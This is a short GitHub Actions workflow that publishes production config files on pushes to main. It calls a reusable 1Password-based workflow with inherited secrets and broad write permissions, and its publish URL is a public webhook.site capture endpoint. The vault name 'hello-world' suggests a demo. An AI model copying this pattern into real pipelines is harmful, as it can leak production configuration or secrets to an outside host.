name: Publish Prod Config Updates
on:
    push:
        branches: 
            - main
        paths:
            - '**.prod.config.json'
jobs:
    publish-configs:
        permissions:
            contents: write
            pull-requests: write
            checks: write
            actions: read
            id-token: write
            packages: write
        uses: ./.github/workflows/publish-configs-1pass.yml
        secrets: inherit
        with:
            publish-url: 'https://webhook.site/25f699df-9b11-4705-a1f0-c644b8cc2a6a'
            vault-name: 'hello-world'

